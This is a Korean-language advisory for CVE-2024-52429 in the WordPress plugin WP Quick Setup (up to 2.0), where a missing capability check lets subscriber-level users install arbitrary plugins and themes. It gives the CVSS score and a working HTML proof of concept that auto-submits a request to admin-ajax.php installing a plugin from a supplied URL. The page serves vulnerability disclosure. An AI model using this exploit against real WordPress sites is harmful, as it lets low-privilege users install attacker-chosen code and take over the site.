
WP Quick Setup <= 2.0 - 인증된 (구독자 이상) 사용자의 임의 플러그인/테마 설치에 대한 인증 누락
WP Quick Setup <= 2.0 - 인증 누락으로 인한 인증된 사용자(Subscriber+)의 임의 플러그인/테마 설치
WordPress용 WP Quick Setup 플러그인은 2.0까지의 모든 버전에서 함수에 대한 기능 확인(capability check)이 누락되어 인증되지 않은 플러그인 및 테마 설치에 취약합니다. 이로 인해
Type: plugin
CVSS Score: 8.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVE: CVE-2024-52429
구독자로 로그인한 후 이 HTML을 실행하세요
<html>
<body>
<form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="wes_install_plugins" />
<input type="hidden" name="plugin_urls[]" value="https://downloads.wordpress.org/plugin/wdes-responsive-mobile-menu.zip" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>